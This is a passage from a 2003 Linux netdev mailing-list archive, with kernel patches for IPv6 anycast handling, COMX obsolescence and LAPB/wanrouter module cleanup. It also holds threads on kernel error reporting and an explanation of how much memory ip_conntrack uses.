*dev); > + struct net_device *dev, > + int anycast); > > extern int ip6_rt_addr_del(struct in6_addr *addr, > struct net_device *dev); > @@ -116,6 +117,13 @@ > np->daddr_cache = daddr; > np->dst_cookie = rt->rt6i_node ? rt->rt6i_node->fn_sernum : 0; > write_unlock(&sk->sk_dst_lock); > +} > + > +static inline int ipv6_unicast_destination(struct sk_buff *skb) > +{ > + struct rt6_info *rt = (struct rt6_info *) skb->dst; > + > + return rt->rt6i_flags & RTF_LOCAL; > } > > #endif > diff -Nru a/include/net/ipv6.h b/include/net/ipv6.h > --- a/include/net/ipv6.h Fri Jul 18 00:49:43 2003 > +++ b/include/net/ipv6.h Fri Jul 18 00:49:43 2003 > @@ -51,7 +51,7 @@ > /* > * Addr type > * > - * type - unicast | multicast | anycast > + * type - unicast | multicast > * scope - local | site | global > * v4 - compat > * v4mapped > @@ -63,7 +63,6 @@ > > #define IPV6_ADDR_UNICAST 0x0001U > #define IPV6_ADDR_MULTICAST 0x0002U > -#define IPV6_ADDR_ANYCAST 0x0004U > > #define IPV6_ADDR_LOOPBACK 0x0010U > #define IPV6_ADDR_LINKLOCAL 0x0020U > diff -Nru a/net/ipv6/addrconf.c b/net/ipv6/addrconf.c > --- a/net/ipv6/addrconf.c Fri Jul 18 00:49:43 2003 > +++ b/net/ipv6/addrconf.c Fri Jul 18 00:49:43 2003 > @@ -209,15 +209,8 @@ > }; > return type; > } > - /* check for reserved anycast addresses */ > - > - if ((st & htonl(0xE0000000)) && > - ((addr->s6_addr32[2] == htonl(0xFDFFFFFF) && > - (addr->s6_addr32[3] | htonl(0x7F)) == (u32)~0) || > - (addr->s6_addr32[2] == 0 && addr->s6_addr32[3] == 0))) > - type = IPV6_ADDR_ANYCAST; > - else > - type = IPV6_ADDR_UNICAST; > + > + type = IPV6_ADDR_UNICAST; > > /* Consider all addresses with the first three bits different of > 000 and 111 as finished. > @@ -2552,7 +2545,7 @@ > > switch (event) { > case RTM_NEWADDR: > - ip6_rt_addr_add(&ifp->addr, ifp->idev->dev); > + ip6_rt_addr_add(&ifp->addr, ifp->idev->dev, 0); > break; > case RTM_DELADDR: > addrconf_leave_solict(ifp->idev->dev, &ifp->addr); > diff -Nru a/net/ipv6/anycast.c b/net/ipv6/anycast.c > --- a/net/ipv6/anycast.c Fri Jul 18 00:49:43 2003 > +++ b/net/ipv6/anycast.c Fri Jul 18 00:49:43 2003 > @@ -96,7 +96,6 @@ > return onlink; > } > > - > /* > * socket join an anycast group > */ > @@ -110,8 +109,12 @@ > int ishost = !ipv6_devconf.forwarding; > int err = 0; > > + if (!capable(CAP_NET_ADMIN)) > + return -EPERM; > if (ipv6_addr_type(addr) & IPV6_ADDR_MULTICAST) > return -EINVAL; > + if (ipv6_chk_addr(addr, NULL)) > + return -EINVAL; > > pac = sock_kmalloc(sk, sizeof(struct ipv6_ac_socklist), GFP_KERNEL); > if (pac == NULL) > @@ -161,21 +164,12 @@ > * For hosts, allow link-local or matching prefix anycasts. > * This obviates the need for propagating anycast routes while > * still allowing some non-router anycast participation. > - * > - * allow anyone to join anycasts that don't require a special route > - * and can't be spoofs of unicast addresses (reserved anycast only) > */ > if (!ip6_onlink(addr, dev)) { > if (ishost) > err = -EADDRNOTAVAIL; > - else if (!capable(CAP_NET_ADMIN)) > - err = -EPERM; > if (err) > goto out_dev_put; > - } else if (!(ipv6_addr_type(addr) & IPV6_ADDR_ANYCAST) && > - !capable(CAP_NET_ADMIN)) { > - err = -EPERM; > - goto out_dev_put; > } > > err = ipv6_dev_ac_inc(dev, addr); > @@ -266,6 +260,13 @@ > dev_put(dev); > } > > +#if 0 > +/* The function is not used, which is funny. Apparently, author > + * supposed to use it to filter out datagrams inside udp/raw but forgot. > + * > + * It is OK, anycasts are not special comparing to delivery to unicasts. > + */ > + > int inet6_ac_check(struct sock *sk, struct in6_addr *addr, int ifindex) > { > struct ipv6_ac_socklist *pac; > @@ -286,6 +287,8 @@ > return found; > } > > +#endif > + > static void aca_put(struct ifacaddr6 *ac) > { > if (atomic_dec_and_test(&ac->aca_refcnt)) { > @@ -347,7 +350,7 @@ > idev->ac_list = aca; > write_unlock_bh(&idev->lock); > > - ip6_rt_addr_add(&aca->aca_addr, dev); > + ip6_rt_addr_add(&aca->aca_addr, dev, 1); > > addrconf_join_solict(dev, &aca->aca_addr); > > diff -Nru a/net/ipv6/icmp.c b/net/ipv6/icmp.c > --- a/net/ipv6/icmp.c Fri Jul 18 00:49:43 2003 > +++ b/net/ipv6/icmp.c Fri Jul 18 00:49:43 2003 > @@ -415,8 +415,7 @@ > > saddr = &skb->nh.ipv6h->daddr; > > - if (ipv6_addr_type(saddr) & IPV6_ADDR_MULTICAST || > - ipv6_chk_acast_addr(0, saddr)) > + if (!ipv6_unicast_destination(skb)) > saddr = NULL; > > memcpy(&tmp_hdr, icmph, sizeof(tmp_hdr)); > diff -Nru a/net/ipv6/ndisc.c b/net/ipv6/ndisc.c > --- a/net/ipv6/ndisc.c Fri Jul 18 00:49:43 2003 > +++ b/net/ipv6/ndisc.c Fri Jul 18 00:49:43 2003 > @@ -785,8 +785,7 @@ > ipv6_addr_all_nodes(&maddr); > ndisc_send_na(dev, NULL, &maddr, &ifp->addr, > ifp->idev->cnf.forwarding, 0, > - ipv6_addr_type(&ifp->addr)&IPV6_ADDR_ANYCAST ? 0 : 1, > - 1); > + 1, 1); > in6_ifa_put(ifp); > return; > } > @@ -809,8 +808,7 @@ > if (neigh || !dev->hard_header) { > ndisc_send_na(dev, neigh, saddr, &ifp->addr, > ifp->idev->cnf.forwarding, 1, > - ipv6_addr_type(&ifp->addr)&IPV6_ADDR_ANYCAST ? 0 : 1, > - 1); > + 1, 1); > if (neigh) > neigh_release(neigh); > } > diff -Nru a/net/ipv6/route.c b/net/ipv6/route.c > --- a/net/ipv6/route.c Fri Jul 18 00:49:43 2003 > +++ b/net/ipv6/route.c Fri Jul 18 00:49:43 2003 > @@ -1256,7 +1256,7 @@ > * Add address > */ > > -int ip6_rt_addr_add(struct in6_addr *addr, struct net_device *dev) > +int ip6_rt_addr_add(struct in6_addr *addr, struct net_device *dev, int anycast) > { > struct rt6_info *rt = ip6_dst_alloc(); > > @@ -1275,6 +1275,8 @@ > rt->u.dst.obsolete = -1; > > rt->rt6i_flags = RTF_UP | RTF_NONEXTHOP; > + if (!anycast) > + rt->rt6i_flags |= RTF_LOCAL; > rt->rt6i_nexthop = ndisc_get_neigh(rt->rt6i_dev, &rt->rt6i_gateway); > if (rt->rt6i_nexthop == NULL) { > dst_free((struct dst_entry *) rt); > diff -Nru a/net/ipv6/tcp_ipv6.c b/net/ipv6/tcp_ipv6.c > --- a/net/ipv6/tcp_ipv6.c Fri Jul 18 00:49:43 2003 > +++ b/net/ipv6/tcp_ipv6.c Fri Jul 18 00:49:43 2003 > @@ -971,7 +971,7 @@ > if (th->rst) > return; > > - if (ipv6_addr_is_multicast(&skb->nh.ipv6h->daddr)) > + if (!ipv6_unicast_destination(skb)) > return; > > /* > @@ -1175,8 +1175,7 @@ > if (skb->protocol == htons(ETH_P_IP)) > return tcp_v4_conn_request(sk, skb); > > - /* FIXME: do the same check for anycast */ > - if (ipv6_addr_is_multicast(&skb->nh.ipv6h->daddr)) > + if (!ipv6_unicast_destination(skb)) > goto drop; > > /* > -- Pekka Savola "You each name yourselves king, yet the Netcore Oy kingdom bleeds." Systems. Networks. Security. -- George R.R. Martin: A Clash of Kings From yoshfuji@linux-ipv6.org Fri Jul 18 02:38:47 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 18 Jul 2003 02:38:57 -0700 (PDT) Received: from yue.hongo.wide.ad.jp (yue.hongo.wide.ad.jp [203.178.139.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6I9cjFl030031 for ; Fri, 18 Jul 2003 02:38:46 -0700 Received: from localhost (localhost [127.0.0.1]) by yue.hongo.wide.ad.jp (8.12.3+3.5Wbeta/8.12.3/Debian-5) with ESMTP id h6I9eEBo016204; Fri, 18 Jul 2003 18:40:16 +0900 Date: Fri, 18 Jul 2003 11:40:12 +0200 (CEST) Message-Id: <20030718.114012.60686118.yoshfuji@linux-ipv6.org> To: andersg@0x63.nu Cc: netdev@oss.sgi.com, yoshfuji@linux-ipv6.org Subject: Re: OOPS in ip6_output2 From: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= In-Reply-To: <20030717151354.GA10640@h55p111.delphi.afb.lu.se> References: <20030717151354.GA10640@h55p111.delphi.afb.lu.se> Organization: USAGI Project X-URL: http://www.yoshifuji.org/%7Ehideaki/ X-Fingerprint: 90 22 65 EB 1E CF 3A D1 0B DF 80 D8 48 07 F8 94 E0 62 0E EA X-PGP-Key-URL: http://www.yoshifuji.org/%7Ehideaki/hideaki@yoshifuji.org.asc X-Face: "5$Al-.M>NJ%a'@hhZdQm:."qn~PA^gq4o*>iCFToq*bAi#4FRtx}enhuQKz7fNqQz\BYU] $~O_5m-9'}MIs`XGwIEscw;e5b>n"B_?j/AkL~i/MEaZBLP X-Mailer: Mew version 2.2 on Emacs 20.7 / Mule 4.1 (AOI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 4155 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: yoshfuji@linux-ipv6.org Precedence: bulk X-list: netdev In article <20030717151354.GA10640@h55p111.delphi.afb.lu.se> (at Thu, 17 Jul 2003 17:13:54 +0200), Anders Gustafsson says: > I don't follow netdev so maybe this is old stuff, but I got this oops when > trying to ssh to a ipv6-host. What version are you using? (Current tree may have fix for this.) Thanks. -- Hideaki YOSHIFUJI @ USAGI Project GPG FP: 9022 65EB 1ECF 3AD1 0BDF 80D8 4807 F894 E062 0EEA From yoshfuji@linux-ipv6.org Fri Jul 18 02:53:51 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 18 Jul 2003 02:53:55 -0700 (PDT) Received: from yue.hongo.wide.ad.jp (yue.hongo.wide.ad.jp [203.178.139.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6I9rnFl032547 for ; Fri, 18 Jul 2003 02:53:50 -0700 Received: from localhost (localhost [127.0.0.1]) by yue.hongo.wide.ad.jp (8.12.3+3.5Wbeta/8.12.3/Debian-5) with ESMTP id h6I9tSBo016301; Fri, 18 Jul 2003 18:55:28 +0900 Date: Fri, 18 Jul 2003 11:55:28 +0200 (CEST) Message-Id: <20030718.115528.21456710.yoshfuji@linux-ipv6.org> To: andersg@0x63.nu Cc: netdev@oss.sgi.com, yoshfuji@linux-ipv6.org Subject: Re: OOPS in ip6_output2 From: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= In-Reply-To: <20030718094615.GD5964@h55p111.delphi.afb.lu.se> References: <20030717151354.GA10640@h55p111.delphi.afb.lu.se> <20030718.114012.60686118.yoshfuji@linux-ipv6.org> <20030718094615.GD5964@h55p111.delphi.afb.lu.se> Organization: USAGI Project X-URL: http://www.yoshifuji.org/%7Ehideaki/ X-Fingerprint: 90 22 65 EB 1E CF 3A D1 0B DF 80 D8 48 07 F8 94 E0 62 0E EA X-PGP-Key-URL: http://www.yoshifuji.org/%7Ehideaki/hideaki@yoshifuji.org.asc X-Face: "5$Al-.M>NJ%a'@hhZdQm:."qn~PA^gq4o*>iCFToq*bAi#4FRtx}enhuQKz7fNqQz\BYU] $~O_5m-9'}MIs`XGwIEscw;e5b>n"B_?j/AkL~i/MEaZBLP X-Mailer: Mew version 2.2 on Emacs 20.7 / Mule 4.1 (AOI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 4156 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: yoshfuji@linux-ipv6.org Precedence: bulk X-list: netdev In article <20030718094615.GD5964@h55p111.delphi.afb.lu.se> (at Fri, 18 Jul 2003 11:46:15 +0200), Anders Gustafsson says: > Latest bk as of wednesday I think. > > It did just happen once in that kernel, so I don't really know if it's > solved in latest bk which I run now. Well, I fixed a refcnt bug on Wednesday. Please tell us if you saw similar bug again. Thanks. --yoshfuji From jkenisto@us.ibm.com Fri Jul 18 10:09:12 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 18 Jul 2003 10:09:21 -0700 (PDT) Received: from e35.co.us.ibm.com (e35.co.us.ibm.com [32.97.110.133]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6IH95Fl010899 for ; Fri, 18 Jul 2003 10:09:12 -0700 Received: from westrelay02.boulder.ibm.com (westrelay02.boulder.ibm.com [9.17.195.11]) by e35.co.us.ibm.com (8.12.9/8.12.2) with ESMTP id h6IH86c8169732; Fri, 18 Jul 2003 13:08:06 -0400 Received: from us.ibm.com (d03av02.boulder.ibm.com [9.17.193.82]) by westrelay02.boulder.ibm.com (8.12.9/NCO/VER6.5) with ESMTP id h6IH7sA4065752; Fri, 18 Jul 2003 11:07:55 -0600 Message-ID: <3F182907.30EA5922@us.ibm.com> Date: Fri, 18 Jul 2003 10:06:15 -0700 From: Jim Keniston X-Mailer: Mozilla 4.75 [en] (WinNT; U) X-Accept-Language: en MIME-Version: 1.0 To: James Morris CC: Andrew Morton , davem@redhat.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com, jgarzik@pobox.com, alan@lxorguk.ukuu.org.uk, rddunlap@osdl.org, kuznet@ms2.inr.ac.ru Subject: Re: [PATCH] [1/2] kernel error reporting (revised) References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 4157 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jkenisto@us.ibm.com Precedence: bulk X-list: netdev James Morris wrote: > > On Thu, 17 Jul 2003, Jim Keniston wrote: > > > 3. Given the above, what should the evlog.c caller do when > > kernel_error_event_iov() returns -EINPROGRESS? > > a. Nothing. Figure the packet will probably get logged. > > b. Just to be safe, report it via printk, the same way we report dropped > > packets. > > We currently do (a). (b) would mean that every event logged from IRQ > > context would be cc-ed to printk. > > I don't think this irq detection logic should be added at all here, let > the caller reschedule its logging if running in irq context. > > - James > -- > James Morris > Yes, this makes sense. At the kerror.c level, just return -EDEADLK if in_irq(). Delay packet delivery (via a tasklet, as before) at the evlog.c level instead. That way, we know at the evlog.c level (in the tasklet) whether the event packet was delivered to anybody, and can paraphrase it to printk if it wasn't. Is this the sort of thing you had in mind? Jim K From shemminger@osdl.org Fri Jul 18 12:36:35 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 18 Jul 2003 12:36:45 -0700 (PDT) Received: from mail.osdl.org (fw.osdl.org [65.172.181.6]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6IJaYFl017798 for ; Fri, 18 Jul 2003 12:36:35 -0700 Received: from dell_ss3.pdx.osdl.net (dell_ss3.pdx.osdl.net [172.20.1.60]) by mail.osdl.org (8.11.6/8.11.6) with SMTP id h6IJaPI08695; Fri, 18 Jul 2003 12:36:25 -0700 Date: Fri, 18 Jul 2003 12:36:25 -0700 From: Stephen Hemminger To: Jeff Garzik Cc: Gergely Madarasz , netdev@oss.sgi.com Subject: Re: comx drivers in 2.6 Message-Id: <20030718123625.6f8ae9b9.shemminger@osdl.org> In-Reply-To: <3F173458.6060405@pobox.com> References: <20030717163337.78d123c0.shemminger@osdl.org> <3F173458.6060405@pobox.com> Organization: Open Source Development Lab X-Mailer: Sylpheed version 0.9.3claws (GTK+ 1.2.10; i686-pc-linux-gnu) X-Face: &@E+xe?c%:&e4D{>f1O<&U>2qwRREG5!}7R4;D<"NO^UI2mJ[eEOA2*3>(`Th.yP,VDPo9$ /`~cw![cmj~~jWe?AHY7D1S+\}5brN0k*NE?pPh_'_d>6;XGG[\KDRViCfumZT3@[ Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4158 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: shemminger@osdl.org Precedence: bulk X-list: netdev On Thu, 17 Jul 2003 19:42:16 -0400 Jeff Garzik wrote: > Stephen Hemminger wrote: > > It looks like the comx drivers never got updated for 2.5/2.6. Some > > obvious issues are: > > - lots of use of /proc files without setting the owner field. > > - still using cli/sti > > - no SMP locking on the linked list (which could be changed to list macros) > > of hardware and protocols. > > > > Just bumped into this while trying to inspect for all the last possible > > broken usage of net_device structure. It is too far behind to address > > those issues. > > > Submit a patch to mark these CONFIG_OBSOLETE. AFAIK nobody has cared > for most of them since 2.2... (munich is an exception) > diff -Nru a/drivers/net/wan/Kconfig b/drivers/net/wan/Kconfig --- a/drivers/net/wan/Kconfig Fri Jul 18 11:55:47 2003 +++ b/drivers/net/wan/Kconfig Fri Jul 18 11:55:47 2003 @@ -60,9 +60,10 @@ # # COMX drivers # +# Not updated to 2.6. config COMX tristate "MultiGate (COMX) synchronous serial boards support" - depends on WAN && (ISA || PCI) + depends on WAN && (ISA || PCI) && OBSOLETE ---help--- Say Y if you want to use any board from the MultiGate (COMX) family. These boards are synchronous serial adapters for the PC, From dax@gurulabs.com Fri Jul 18 13:07:31 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 18 Jul 2003 13:07:36 -0700 (PDT) Received: from mail.gurulabs.com (you@[66.62.77.7]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6IK7UFl019039 for ; Fri, 18 Jul 2003 13:07:30 -0700 Received: from dhcp9.hq.gurulabs.com (dhcp9.hq.gurulabs.com [10.1.2.9]) by mail.gurulabs.com (Postfix) with ESMTP id 4015877A1 for ; Fri, 18 Jul 2003 14:07:29 -0600 (MDT) Subject: Memory usage for ip_conntrack From: Dax Kelson To: netdev@oss.sgi.com Content-Type: text/plain Message-Id: <1058558848.2674.88.camel@mentor.gurulabs.com> Mime-Version: 1.0 X-Mailer: Ximian Evolution 1.4.3 Date: 18 Jul 2003 14:07:29 -0600 Content-Transfer-Encoding: 7bit X-archive-position: 4159 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: dax@gurulabs.com Precedence: bulk X-list: netdev I'm teaching a Linux class and the book says "Using ip_conntrack will use much more memory". A student asked me how much is "much". So on a 2.4.20+ how much memory does it take to track the state of a connection? If I echo 102400 > /proc/sys/net/ipv4/ip_conntrack_max, what is my worst case memory usage? TIA, Dax Kelson From shemminger@osdl.org Fri Jul 18 13:32:30 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 18 Jul 2003 13:32:37 -0700 (PDT) Received: from mail.osdl.org (fw.osdl.org [65.172.181.6]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6IKWTFl020036 for ; Fri, 18 Jul 2003 13:32:30 -0700 Received: from dell_ss3.pdx.osdl.net (dell_ss3.pdx.osdl.net [172.20.1.60]) by mail.osdl.org (8.11.6/8.11.6) with SMTP id h6IKWBI22711; Fri, 18 Jul 2003 13:32:12 -0700 Date: Fri, 18 Jul 2003 13:32:11 -0700 From: Stephen Hemminger To: Henner Eisen , "David S. Miller" Cc: netdev@oss.sgi.com Subject: [PATCH] Remove MOD_* from LAPB Message-Id: <20030718133211.1c7ed08d.shemminger@osdl.org> Organization: Open Source Development Lab X-Mailer: Sylpheed version 0.9.3claws (GTK+ 1.2.10; i686-pc-linux-gnu) X-Face: &@E+xe?c%:&e4D{>f1O<&U>2qwRREG5!}7R4;D<"NO^UI2mJ[eEOA2*3>(`Th.yP,VDPo9$ /`~cw![cmj~~jWe?AHY7D1S+\}5brN0k*NE?pPh_'_d>6;XGG[\KDRViCfumZT3@[ Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4160 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: shemminger@osdl.org Precedence: bulk X-list: netdev The MOD_INC and MOD_DEC in lapb are no longer necessary in 2.6 since the module subsystem will not allow lapb to be unloaded as long as a module that is referencing the symbols (lapb_register/lapb_unregister) is loaded. The lapb parameter block does have callback's so it is up to the caller to correctly unregister on module exit; and looking at the existing code it does do that. Patch is against 2.6-test1 diff -Nru a/net/lapb/lapb_iface.c b/net/lapb/lapb_iface.c --- a/net/lapb/lapb_iface.c Fri Jul 18 13:21:02 2003 +++ b/net/lapb/lapb_iface.c Fri Jul 18 13:21:02 2003 @@ -43,13 +43,11 @@ static rwlock_t lapb_list_lock = RW_LOCK_UNLOCKED; /* - * Free an allocated lapb control block. This is done to centralise - * the MOD count code. + * Free an allocated lapb control block. */ static void lapb_free_cb(struct lapb_cb *lapb) { kfree(lapb); - MOD_DEC_USE_COUNT; } static __inline__ void lapb_hold(struct lapb_cb *lapb) @@ -126,8 +124,6 @@ if (!lapb) goto out; - - MOD_INC_USE_COUNT; memset(lapb, 0x00, sizeof(*lapb)); From shemminger@osdl.org Fri Jul 18 13:35:26 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 18 Jul 2003 13:35:30 -0700 (PDT) Received: from mail.osdl.org (fw.osdl.org [65.172.181.6]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6IKZPFl020426 for ; Fri, 18 Jul 2003 13:35:26 -0700 Received: from dell_ss3.pdx.osdl.net (dell_ss3.pdx.osdl.net [172.20.1.60]) by mail.osdl.org (8.11.6/8.11.6) with SMTP id h6IKZCI23380; Fri, 18 Jul 2003 13:35:12 -0700 Date: Fri, 18 Jul 2003 13:35:12 -0700 From: Stephen Hemminger To: Nenad Corbic , "David S. Miller" Cc: netdev@oss.sgi.com Subject: [PATCH] Eliminate MOD_ from wanrouter Message-Id: <20030718133512.434b1e70.shemminger@osdl.org> Organization: Open Source Development Lab X-Mailer: Sylpheed version 0.9.3claws (GTK+ 1.2.10; i686-pc-linux-gnu) X-Face: &@E+xe?c%:&e4D{>f1O<&U>2qwRREG5!}7R4;D<"NO^UI2mJ[eEOA2*3>(`Th.yP,VDPo9$ /`~cw![cmj~~jWe?AHY7D1S+\}5brN0k*NE?pPh_'_d>6;XGG[\KDRViCfumZT3@[ Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4161 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: shemminger@osdl.org Precedence: bulk X-list: netdev Wan router register/unregister doesn't need MOD_INC/MOD_DEC because it can't be unloaded as long as it's symbols are in use by the calling module. Patch against 2.6.0-test1 diff -Nru a/net/wanrouter/wanmain.c b/net/wanrouter/wanmain.c --- a/net/wanrouter/wanmain.c Fri Jul 18 13:20:48 2003 +++ b/net/wanrouter/wanmain.c Fri Jul 18 13:20:48 2003 @@ -305,7 +305,6 @@ wandev->dev = NULL; wandev->next = wanrouter_router_devlist; wanrouter_router_devlist = wandev; - MOD_INC_USE_COUNT; /* prevent module from unloading */ return 0; } @@ -350,7 +349,6 @@ wanrouter_router_devlist = wandev->next; wanrouter_proc_delete(wandev); - MOD_DEC_USE_COUNT; return 0; } From gandalf@wlug.westbo.se Fri Jul 18 14:28:16 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 18 Jul 2003 14:28:23 -0700 (PDT) Received: from tux.rsn.bth.se (postfix@tux.rsn.bth.se [194.47.143.135]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6ILSEFl023055 for ; Fri, 18 Jul 2003 14:28:15 -0700 Received: by tux.rsn.bth.se (Postfix, from userid 501) id 2AE863F93; Fri, 18 Jul 2003 23:28:11 +0200 (CEST) Subject: Re: Memory usage for ip_conntrack From: Martin Josefsson To: Dax Kelson Cc: netdev@oss.sgi.com In-Reply-To: <1058558848.2674.88.camel@mentor.gurulabs.com> References: <1058558848.2674.88.camel@mentor.gurulabs.com> Content-Type: text/plain Content-Transfer-Encoding: 7bit Message-Id: <1058563690.26030.23.camel@tux.rsn.bth.se> Mime-Version: 1.0 X-Mailer: Ximian Evolution 1.4.0 Date: 18 Jul 2003 23:28:10 +0200 X-archive-position: 4162 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: gandalf@wlug.westbo.se Precedence: bulk X-list: netdev On Fri, 2003-07-18 at 22:07, Dax Kelson wrote: > I'm teaching a Linux class and the book says "Using ip_conntrack will > use much more memory". > > A student asked me how much is "much". > > So on a 2.4.20+ how much memory does it take to track the state of a > connection? This depends on which patches you've applied and if you have selected NAT support when you compiled it or not. You can see how much memory it uses by looking at the kernel output when ip_conntrack is initialized. It looks like: ip_conntrack version 2.1 (5632 buckets, 45056 max) - 304 bytes per conntrack That's the number of bytes ip_conntrack will try to allocate for each connection. But it isn't neccessarily the real number of bytes allocated. You'll have to look at /proc/slabinfo for that. Look at column 4, that's the object size. In my case it's 320 bytes. And each bucket in the hashtable will use 8 bytes on a 32bit machine, 16 bytes on a 64bit machine. > If I echo 102400 > /proc/sys/net/ipv4/ip_conntrack_max, what is my worst > case memory usage? Don't do this. This will increase the maximum number of connections it will track, but not the number of buckets. Which means that it will be slower due to longer collision-chains. Instead increase the number of buckets. modprobe ip_conntrack hashsize=131072 (or any number here. If it's a < 2.4.21 kernel 2^n sizes aren't recommended due to a poor hashfunction. Instead you should use 2^n-1) In my case the memory-usage for the above numbers would be: 5632 buckets * 8 bytes (32bit machine) + 102400 * 320 bytes (object size from slabinfo) = 45056 + 32768000 ~= 31.3 MB Increasing the number of buckets doesn't cost much memory compared to the actual connections and it gives you a nice performanceboost if you are trying to handle lots of connections. (the default is based on the amount of memory in the machine and it's normally ok for desktop machines and small servers/routers) ip_conntrack is a memory-hog, we are working on reducing the memory-usage. -- /Martin From shemminger@osdl.org Fri Jul 18 15:01:16 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 18 Jul 2003 15:01:20 -0700 (PDT) Received: from mail.osdl.org (fw.osdl.org [65.172.181.6]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6IM1FFl024426 for ; Fri, 18 Jul 2003 15:01:16 -0700 Received: from dell_ss3.pdx.osdl.net (dell_ss3.pdx.osdl.net [172.20.1.60]) by mail.osdl.org (8.11.6/8.11.6) with SMTP id h6IM11I13576; Fri, 18 Jul 2003 15:01:01 -0700 Date: Fri, 18 Jul 2003 15:01:01 -0700 From: Stephen Hemminger To: Henner Eisen , "David S. Miller" Cc: netdev@oss.sgi.com Subject: [PATCH] Allow lapb to be unloaded. Message-Id: <20030718150101.0558d04e.shemminger@osdl.org> In-Reply-To: <20030718133211.1c7ed08d.shemminger@osdl.org> References: <20030718133211.1c7ed08d.shemminger@osdl.org> Organization: Open Source Development Lab X-Mailer: Sylpheed version 0.9.3claws (GTK+ 1.2.10; i686-pc-linux-gnu) X-Face: &@E+xe?c%:&e4D{>f1O<&U>2qwRREG5!}7R4;D<"NO^UI2mJ[eEOA2*3>(`Th.yP,VDPo9$ /`~cw![cmj~~jWe?AHY7D1S+\}5brN0k*NE?pPh_'_d>6;XGG[\KDRViCfumZT3@[ Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4163 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: shemminger@osdl.org Precedence: bulk X-list: netdev Without an exit routine lapb can't be unloaded. Tested on 2.6.0-test1 diff -Nru a/net/lapb/lapb_iface.c b/net/lapb/lapb_iface.c --- a/net/lapb/lapb_iface.c Fri Jul 18 14:52:18 2003 +++ b/net/lapb/lapb_iface.c Fri Jul 18 14:52:18 2003 @@ -443,8 +443,14 @@ return 0; } +static void __exit lapb_exit(void) +{ + WARN_ON(!list_empty(&lapb_list)); +} + MODULE_AUTHOR("Jonathan Naylor "); MODULE_DESCRIPTION("The X.25 Link Access Procedure B link layer protocol"); MODULE_LICENSE("GPL"); module_init(lapb_init); +module_exit(lapb_exit); From jkenisto@us.ibm.com Fri Jul 18 16:32:55 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 18 Jul 2003 16:33:03 -0700 (PDT) Received: from e4.ny.us.ibm.com (e4.ny.us.ibm.com [32.97.182.104]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6INWmFl026657 for ; Fri, 18 Jul 2003 16:32:55 -0700 Received: from northrelay04.pok.ibm.com (northrelay04.pok.ibm.com [9.56.224.206]) by e4.ny.us.ibm.com (8.12.9/8.12.2) with ESMTP id h6INVNwO057664; Fri, 18 Jul 2003 19:31:26 -0400 Received: from us.ibm.com (d01av02.pok.ibm.com [9.56.224.216]) by northrelay04.pok.ibm.com (8.12.9/NCO/VER6.5) with ESMTP id h6INVJ7R015238; Fri, 18 Jul 2003 19:31:20 -0400 Message-ID: <3F1882CF.538FE76@us.ibm.com> Date: Fri, 18 Jul 2003 16:29:19 -0700 From: Jim Keniston X-Mailer: Mozilla 4.75 [en] (WinNT; U) X-Accept-Language: en MIME-Version: 1.0 To: James Morris CC: Andrew Morton , davem@redhat.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com, jgarzik@pobox.com, alan@lxorguk.ukuu.org.uk, rddunlap@osdl.org, kuznet@ms2.inr.ac.ru, jkenisto@us.ibm.com Subject: Re: [PATCH] [1/2] kernel error reporting (revised) References: Content-Type: text/plain; charset=us-ascii 